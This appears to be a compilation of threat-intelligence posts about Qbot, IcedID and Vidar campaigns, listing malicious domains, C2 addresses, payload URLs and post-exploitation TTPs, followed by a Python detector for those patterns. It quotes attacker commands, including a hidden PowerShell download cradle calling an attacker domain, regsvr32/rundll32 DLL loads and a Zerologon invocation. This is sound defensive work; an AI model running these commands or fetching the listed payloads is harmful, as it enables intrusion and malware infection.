Incoming BB14 #qbot .one campaign, hijacked threads, OneNote names:
item.one
notes.one
cancellation.one
dll links:
https://nerulgymkhana[.]com/CCoN/01.gif
https://tassoinmobiliaria[.]com/56G0/01.gif
c2:
92.177.204.2
hash:
7a8860f6975853e167c121a6c28b3f60c011e8aa93130856f73d9df688ec589f
Hopefully everyone is staying safe with the #malvertising campaigns during tax season.
Sophos has observed further activity stemming from #IcedID mimicking the IRS.
🔍️ Search term: "w-9 form 2023"
➡️ Abuse of Google #adsense
↪️ Redirected to fake IRS site
⏩️ \AppData\Local\Temp\Temp1_IRS_form_package.zip\IRS_form_package.exe
C2 connection: druidfenixis[.]com
Sample hosted on Firebase: hxxps://firebasestorage.googleapis[.]com/v0/b/fleet-muse-370809.appspot.com/o/frHfwF6lkh%2FIRS_form_package_24-01-2023_18-35-16.zip?alt=media&token=0e8837df-a50b-4ac9-8b35-fe6d869c717b
From yesterday morning until just now my script had performed 960 Google searches for "notepad++ download". Of those 960 searches, 106 malicious ads were offered from these 7 domains.
freeigal[.]com
nolepad-plusplus[.]fun
notepad-plasplas[.]site
notepad-plus-plus[.]space
notepad-plus-plus.webs1teads[.]com
notepadpp[.]store
noutepad.from1many[.]com
Notepad++ feels like a techie kinda tool. Seems like they're trying to target IT.
Hey :)
We published a detailed report on #Vidar infrastructure management, explaining how they are working. We also share malware configuration extractor over the C2, backend IPs, etc:
https://team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure
Happy Hunting and feedback warmly welcomed 😊
Summary: Three key takeaways from our analysis of Vidar infrastructure: Russian VPN gateways are potentially providing anonymity for Vidar operators / customers, making it more challenging for analysts to have a complete overview of this threat. These gateways now appear to be migrating to Tor. Vidar operators appear to be expanding their infrastructure, so analysts need to keep them in their sights. We expect a new wave of customers and, as a result, an increase in campaigns in the upcoming weeks.
#IcedID C2s for blocking!
The threat actors involved in the current malvertising campaigns via Google ads are even outbidding official brands.
(this was reported to Google)
Chain:
timviwer[.]site
wvwteamviewer[.]top
Payload:
firebasestorage[.]googleapis[.]com/v0/b/psychic-valve-370812.appspot.com/o/rt7635VXeJ%2FSetup_Win_19-01-2023_16-54-08.zip?alt=media&token=c7719ef4-8c00-400b-9cec-288395301241
During the past several weeks, there has been a dramatic increase in malvertising via Google ads.
The concern is that a lot of people (customers, but also your family and friends) are going to download malware or get scammed when performing common searches.
While it’s unclear what impact the recent layoffs at Google will have, I’ve decided with some fellow researchers to work together and aggregate this malvertising data.
We’re adding information about current malware campaigns and sharing it in real-time with contacts at Google.
If you would like to join this effort, please get in touch and I will provide more details.
For the past couple of weeks, #IcedID has been hitting hard, with post-exploitation activities beginning within ~1 hour from the initial infection.
Here are some TTPs and IOCs from these post-exploitation activities that will keep defenders ready.
🎯TTPs🎯
➡️IcedID use of VNC
💡Over port 8080
➡️Multiple Cobalt Strike DLLs on disk
💡Overused directories - "C:\Windows\Tasks" & "%user%\AppData\Local\Temp"
➡️Heavy use of PowerShell
💡Downloading payloads, exec PowerShell Cobalt Strike Loaders & other processes
➡️Used multiple privilege escalation methods
💡zerologon, Invoke-Kerberoast, Invoke-EnvBypass
➡️Reverse proxy via Cobalt Strike and then RDPing into the network
➡️Invoke-BloodHound & Invoke-ShareFinder for network and open-shares discovery
🛡️IOCs🛡️
➡️Cobalt Strike C2 & staging servers
💡23.227.202.66 - allowedcloud\.com
💡64.227.8.75:80 (Hosting files & possible redirector pointing to allowedcloud\.com)
💡80.77.25.65:443 - jumptoupd\.com
➡️Cobalt Strike payload execution
💡regsvr32.exe /s C:\Users\<user>\AppData\Local\Temp\<DLL>
💡rundll32.exe /s c:\windows\tasks\<DLL>,NtSetSystemTime
💡powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('hxxp://allowedcloud\.com:80/ItsMyBIT'))"
➡️IcedID C2 Servers
💡51.195.169.87:8080 - VNC connections
💡185.99.133.122:443
💡23.254.202.234:443
💡89.44.9.157:443
➡️Zerologon exploit - virustotal.com/gui/file/36bc3…
💡zero.exe [DC IP ADDRESS] [DOMAIN NAME] [DOMAIN ADMIN] -c "whoami > [RESULTED OUTPUT DIR/FILE]"
These are the most common TTPs and some new IOCs related to IcedID Hands-On-Keyboard post-exploitation activities.
Thanks to @pr0xylife for sharing the IcedID samples 🙏
Get additional context along with more IOCs like these @ https://thedfirreport.com/services
Stay safe💙
#infosec #incidentresponse #threatintel #IOC
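As an added, defender-side example (not part of the thread above or The DFIR Report's own tooling): a small Python scanner that flags the three "Cobalt Strike payload execution" patterns the thread lists (regsvr32 loading a DLL from the user's Temp folder, rundll32 loading a DLL from C:\Windows\Tasks, and a hidden PowerShell IEX download cradle) in process-creation command lines. The sample events, the placeholder domain and the rule names are constructed assumptions, not telemetry from the incidents described.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
# Three mirror the execution patterns named in the thread; three are benign.
SAMPLE_EVENTS = [
    r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\update.dll",
    r"rundll32.exe /s c:\windows\tasks\svc.dll,NtSetSystemTime",
    "powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient)"
    ".downloadstring('http://c2.example.invalid:80/stage'))\"",   # placeholder host
    r"regsvr32.exe /s C:\Program Files\Vendor\lib.dll",
    r"rundll32.exe shell32.dll,Control_RunDLL",
    "powershell.exe -Command Get-Process",
]

# Hypothetical rule names; each regex encodes one TTP from the thread.
RULES = {
    # regsvr32 /s <DLL> where the DLL sits under %LOCALAPPDATA%\Temp
    "regsvr32_temp_dll": re.compile(
        r"regsvr32(\.exe)?\s+.*\\appdata\\local\\temp\\[^\s]+\.dll", re.I),
    # rundll32 /s c:\windows\tasks\<DLL>,<export>
    "rundll32_tasks_dir": re.compile(
        r"rundll32(\.exe)?\s+.*\\windows\\tasks\\[^\s,]+\.dll,\w+", re.I),
    # hidden/no-profile PowerShell evaluating a downloaded string
    "powershell_iex_download": re.compile(
        r"powershell(\.exe)?.*(-nop|-w\s+hidden).*(iex|invoke-expression).*downloadstring",
        re.I),
}


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(events):
    """Return (cmdline, matched_rules) for each event that hits at least one rule."""
    hits = []
    for cmdline in events:
        names = classify(cmdline)
        if names:
            hits.append((cmdline, names))
    return hits


if __name__ == "__main__":
    for cmdline, names in scan(SAMPLE_EVENTS):
        print(", ".join(names), "<=", cmdline)
```

The rules key on the directories and switches the thread calls out rather than on file names, since the DLL names in these intrusions vary while the staging locations do not.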
#IcedID C2s for blocking